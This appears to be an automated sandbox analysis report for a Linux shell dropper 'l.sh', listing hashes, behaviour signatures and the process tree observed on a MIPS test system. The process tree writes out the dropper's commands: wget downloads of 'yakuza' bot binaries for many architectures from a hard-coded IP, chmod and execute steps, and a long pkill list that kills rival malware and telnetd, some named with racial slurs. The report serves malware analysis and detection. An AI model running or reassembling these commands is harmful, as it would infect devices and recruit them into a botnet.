Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
17-11-2024 09:07
General
-
Target
l.sh
-
Size
1KB
-
MD5
b5a7f5f630bc2eee5f8a30ecc75b3e9c
-
SHA1
adc6352bb1ca055207d877c1fb3c7486adc0be20
-
SHA256
37b2c36f599fd5ba676cce6512abe7aa47c08605aacf3fa31b536054d6e067f7
-
SHA512
ad8c3562b969fa3f6ae958cde6202dace4fbabbf8da1d5c57e89cb707b77fd2e76154df4a5d4a719eb931763fa70de9d224b4c29f93320db5251c5acfc5ff679
Score
7/10
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 9 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/l.sh/tmp/l.sh1⤵
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.mips2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mips./yakuza.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
-
/bin/shsh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵
-
/usr/bin/pkillpkill -9 902i134⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 902i134⤵
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵
-
-
-
/bin/shsh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵
-
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵
-
-
-
/bin/shsh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵
-
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵
-
-
-
/bin/shsh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵
-
/usr/bin/pkillpkill -9 JuYfouyf874⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵
-
-
-
/bin/shsh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵
-
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵
-
-
-
/bin/shsh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵
-
/usr/bin/pkillpkill -9 ekjheory98e4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵
-
-
-
/bin/shsh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵
-
/usr/bin/pkillpkill -9 scansh44⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵
-
-
-
/bin/shsh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵
-
/usr/bin/pkillpkill -9 MDMA4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵
-
-
-
/bin/shsh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵
-
/usr/bin/pkillpkill -9 fdevalvex4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵
-
-
-
/bin/shsh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵
-
/usr/bin/pkillpkill -9 scanspc4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵
-
-
-
/bin/shsh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵
-
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵
-
-
-
/bin/shsh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵
-
/usr/bin/pkillpkill -9 flexsonskids4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵
-
-
-
/bin/shsh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵
-
/usr/bin/pkillpkill -9 scanx864⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵
-
-
-
/bin/shsh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵
-
-
-
/bin/shsh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵
-
-
-
/bin/shsh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵
-
-
-
/bin/shsh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵
-
-
-
/bin/shsh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵
-
/usr/bin/pkillpkill -9 freecookiex864⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵
-
-
-
/bin/shsh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵
-
/usr/bin/pkillpkill -9 sysgpu4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵
-
-
-
/bin/shsh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵
-
/usr/bin/pkillpkill -9 frgege4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵
-
-
-
/bin/shsh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵
-
/usr/bin/pkillpkill -9 sysupdater4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵
-
-
-
/bin/shsh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵
-
/usr/bin/pkillpkill -9 0DnAzepd4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵
-
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵
-
-
-
/bin/shsh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵
-
/usr/bin/pkillpkill -9 frgreu4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵
-
-
-
/bin/shsh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵
-
/usr/bin/pkillpkill -9 telnetd4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵
-
-
-
/bin/shsh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵
-
/usr/bin/pkillpkill -9 0x766f69644⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵
-
-
-
/bin/shsh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵
-
-
-
/bin/shsh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵
-
/usr/bin/pkillpkill -9 gaft4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵
-
-
-
/bin/shsh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵
-
/usr/bin/pkillpkill -9 urasgbsigboa4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵
-
-
-
/bin/shsh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵
-
/usr/bin/pkillpkill -9 120i3UI494⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵
-
-
-
/bin/shsh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵
-
/usr/bin/pkillpkill -9 OaF34⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵
-
-
-
/bin/shsh -c "pkill -9 geae || busybox pkill -9 geae"3⤵
-
/usr/bin/pkillpkill -9 geae4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 geae4⤵
-
-
-
/bin/shsh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵
-
/usr/bin/pkillpkill -9 vaiolmao4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵
-
-
-
/bin/shsh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵
-
/usr/bin/pkillpkill -9 123123a4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 123123a4⤵
-
-
-
/bin/shsh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵
-
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵
-
-
-
/bin/shsh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵
-
/usr/bin/pkillpkill -9 ggTrex4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵
-
-
-
/bin/shsh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵
-
/usr/bin/pkillpkill -9 wasads4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵
-
-
-
/bin/shsh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵
-
-
-
/bin/shsh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵
-
-
-
/bin/shsh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵
-
/usr/bin/pkillpkill -9 ggt4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵
-
-
-
/bin/shsh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵
-
/usr/bin/pkillpkill -9 wget-log4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵
-
-
-
/bin/shsh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵
-
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵
-
-
-
/bin/shsh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵
-
-
-
/bin/shsh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵
-
/usr/bin/pkillpkill -9 ggtq4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵
-
-
-
/bin/shsh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵
-
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵
-
-
-
/bin/shsh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵
-
/usr/bin/pkillpkill -9 SAIAKUSO4⤵
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵
-
-
-
/bin/shsh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵
-
/usr/bin/pkillpkill -9 ggtr4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵
-
-
-
/bin/shsh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵
-
/usr/bin/pkillpkill -9 14Fa4⤵
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵
-
-
-
/bin/shsh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵
-
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵
-
-
-
/bin/shsh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵
-
/usr/bin/pkillpkill -9 ggtt4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵
-
-
-
/bin/shsh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵
-
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵
-
-
-
/bin/shsh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵
-
/usr/bin/pkillpkill -9 haetrghbr4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵
-
-
-
/bin/shsh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵
-
/usr/bin/pkillpkill -9 19ju3d4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵
-
-
-
/bin/shsh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵
-
/usr/bin/pkillpkill -9 SORAojkf1204⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵
-
-
-
/bin/shsh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵
-
/usr/bin/pkillpkill -9 hehahejeje924⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵
-
-
-
/bin/shsh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵
-
-
-
/bin/shsh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵
-
/usr/bin/pkillpkill -9 SlaVLav124⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵
-
-
-
/bin/shsh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵
-
-
-
/bin/shsh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵
-
-
-
/bin/shsh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵
-
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵
-
-
-
/bin/shsh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵
-
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵
-
-
-
/bin/shsh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵
-
/usr/bin/pkillpkill -9 5Gbf4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵
-
-
-
/bin/shsh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵
-
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵
-
-
-
/bin/shsh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵
-
/usr/bin/pkillpkill -9 iaGv4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵
-
-
-
/bin/shsh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵
-
/usr/bin/pkillpkill -9 5aA34⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵
-
-
-
/bin/shsh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵
-
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵
- Reads CPU attributes
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵
-
-
-
/bin/shsh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵
-
/usr/bin/pkillpkill -9 insomni4⤵
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵
-
-
-
/bin/shsh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵
-
/usr/bin/pkillpkill -9 6402774⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 6402774⤵
-
-
-
/bin/shsh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵
-
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵
- Reads CPU attributes
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵
-
-
-
/bin/shsh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- System Network Configuration Discovery
-
/usr/bin/pkillpkill -9 ipcamCache4⤵
- Reads runtime system information
- System Network Configuration Discovery
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
-
-
-
/bin/shsh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵
- Reads runtime system information
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵
-
-
-
-
/bin/rmrm -rf yakuza.mips2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.mipsel2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.mipsel./yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/bin/rmrm -rf yakuza.mipsel2⤵
- System Network Configuration Discovery
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.sh2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sh./yakuza.sh2⤵
-
-
/bin/rmrm -rf yakuza.sh2⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.x862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.x86./yakuza.x862⤵
-
-
/bin/rmrm -rf yakuza.x862⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm62⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm62⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm6./yakuza.arm62⤵
-
-
/bin/rmrm -rf yakuza.arm62⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.i6862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i686./yakuza.i6862⤵
-
-
/bin/rmrm -rf yakuza.i6862⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.ppc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵
-
-
/bin/rmrm -rf yakuza.ppc2⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.i5862⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.i586./yakuza.i5862⤵
-
-
/bin/rmrm -rf yakuza.i5862⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.m68k2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵
-
-
/bin/rmrm -rf yakuza.m68k2⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm42⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵
-
-
/bin/rmrm -rf yakuza.arm42⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm52⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵
-
-
/bin/rmrm -rf yakuza.arm52⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm72⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.arm72⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.arm7./yakuza.arm72⤵
-
-
/bin/rmrm -rf yakuza.arm72⤵
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.sparc2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x yakuza.sparc2⤵
- File and Directory Permissions Modification
-
-
/tmp/yakuza.sparc./yakuza.sparc2⤵
-
-
/bin/rmrm -rf yakuza.sparc2⤵
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
183KB
MD5fe20c84814e3b28ab3b4d72949f09c9a
SHA10bf1e245ca54ea279f349a6110ea3cf2a90bafc8
SHA256cf50bcd9a2ed02b09dc85b05f13526a850da52e616d16d93224282c464c21468
SHA5129a6d894da0f1c50f7ca27f2452d4dc9f531427a417ebb5a2eaa76bb020279fc8171f2926daf25c25817766ea7bf4b85dec2bec1e28a340cd2548c21ec07b8203